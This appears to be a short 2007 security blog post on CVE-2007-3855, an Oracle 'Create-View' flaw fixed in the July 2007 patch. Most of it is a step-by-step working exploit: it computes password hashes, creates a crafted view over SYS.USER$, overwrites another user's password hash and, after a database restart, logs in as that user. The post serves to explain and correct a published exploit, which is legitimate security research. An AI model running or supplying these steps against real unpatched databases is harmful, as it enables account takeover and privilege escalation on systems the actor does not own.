Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.
The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.
Example:
— We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB
c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9
— Now we connect to the database and update the password hash via a specially crafted view.
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;
View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS‘;
1 row updated.
SQL> commit;
Commit complete.
— The password is now changed to HACKED.
SQL> select password from sys.user$ where name=’RDS‘;
PASSWORD
——————————
7B843A192FF96BE9
— But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
— To activate the password change it is necessary to restart the database.
C:\>sqlplus rds/hacked
SQL*Plus: Release 10.2.0.3.0 – Production on Sun Jul 22 18:24:41 2007
Copyright (c) 1982, 2006, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 – Production
With the Partitioning, OLAP and Data Mining Scoring Engine options
SQL>